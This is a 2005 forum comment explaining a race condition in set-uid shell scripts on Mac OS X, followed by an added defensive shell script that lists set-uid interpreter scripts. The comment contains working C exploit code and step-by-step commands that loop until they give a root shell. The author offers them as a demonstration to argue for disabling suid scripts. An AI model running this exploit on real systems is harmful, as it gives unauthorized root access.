Run SUID shell scripts safely
Authored by: gshenaut on Apr 19, '05 06:53:28PM
Yeah, the key to this as I understand it is that you create a symlink in a directory you own to a suid script somewhere else, and then invoke the symlink while immediately replacing it with your own content. I played around with this a little, and it definitely works, better with long scripts than short ones. It is an artifact of the way #! scripts are implemented, passing the name of the script to the interpreter rather than a file descriptor.

So, reluctantly, I am turning sugid_scripts back off on my machines.

I am a firm believer in sunshine as being the best defense against maliciousness, so in that spirit, here is the code I used in my playing around:


#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

int main(void){
        if (fork()) {
                /* parent: exec the symlink, which still resolves to the suid script */
                execl("/Users/MYNAME/mylink", "mylink", (char *)0);
        } else {
                /* child: swap the link for a plain file before the interpreter opens it */
                unlink("mylink");
                write(creat("mylink", 0777), "sh\n", 3);
        }
        exit(0);
}
To convince yourself of the wisdom of disallowing suid scripts, do the following: Change the string MYNAME to your login name and compile the above program. Then find a suid script (you will probably have to make one; if you do, it will work much better if you stick a bunch of comment lines in there to make it take a while to load). To make it suid, run the commands "sudo chown 0:0 SCRIPT; sudo chmod +w,+s SCRIPT", where SCRIPT is the path to your script. My test script was simply

#!/bin/sh
# a long comment line, repeated 100 times
...
whoami

You will have to enable suid scripts:


sudo sysctl -w kern.sugid_scripts=1
Now the fun part: run this command over and over again from your home directory:

rm -f mylink ; ln -s SCRIPT mylink ; ./a.out
where SCRIPT is the path to your suid script. When you get a root prompt, stop. On my 1st edition 17" PB, it takes from 2 to over 20 tries to get root, but I have always gotten there.

Note that you don't need write permission on the script at all, just write permission in your home directory. This little demo turned me from a strong advocate of allowing suid scripts to a strong advocate for disallowing them.

Once you're done with this test, don't forget to remove your test script and to run

sudo sysctl -w kern.sugid_scripts=0

Greg Shenaut

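As an added example (my code, not part of Greg's post): a defender's audit in POSIX sh that lists the set-uid/set-gid interpreter scripts under a directory, which is exactly the class of file the race above depends on, and reads the kern.sugid_scripts switch where that sysctl exists. The function names and the sample files are my own.

```sh
#!/bin/sh
# Added example, not from the original post. Assumes only POSIX sh, find,
# chmod, mktemp and (on Mac OS X) sysctl.

# Print every set-uid or set-gid regular file under $1 whose first line starts
# with "#!", i.e. a script the kernel would hand to an interpreter by path name.
find_sugid_scripts() {
    dir=$1
    find "$dir" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        first_line=
        IFS= read -r first_line < "$f" || true   # no trailing newline is fine
        case $first_line in
            '#!'*) printf '%s\n' "$f" ;;
        esac
    done
}

# Return 0 when the tree holds no set-uid/set-gid scripts, 1 otherwise.
sugid_scripts_clean() {
    n=$(find_sugid_scripts "$1" | wc -l | tr -d ' ')
    [ "$n" -eq 0 ]
}

# On Mac OS X this is the switch the post toggles; elsewhere report "n/a".
sugid_scripts_sysctl() {
    sysctl -n kern.sugid_scripts 2>/dev/null || echo n/a
}

# Self-contained demonstration on constructed files in a temporary directory.
demo_dir=$(mktemp -d)
printf '#!/bin/sh\nwhoami\n' > "$demo_dir/suid_script.sh"
chmod 4755 "$demo_dir/suid_script.sh"          # set-uid script: reported
printf '#!/bin/sh\nwhoami\n' > "$demo_dir/plain_script.sh"
chmod 755 "$demo_dir/plain_script.sh"          # ordinary script: ignored
printf 'not a script\n' > "$demo_dir/suid_data"
chmod 4644 "$demo_dir/suid_data"               # set-uid but not a #! file: ignored
echo "kern.sugid_scripts = $(sugid_scripts_sysctl)"
echo "set-uid/set-gid scripts under $demo_dir:"
find_sugid_scripts "$demo_dir"
sugid_scripts_clean "$demo_dir" || echo "=> consider clearing the s bit or leaving kern.sugid_scripts=0"
rm -rf "$demo_dir"
```

Run it against / (or /usr/local) as root to see what your own system carries; an empty listing plus kern.sugid_scripts=0 is the state Greg ends up recommending.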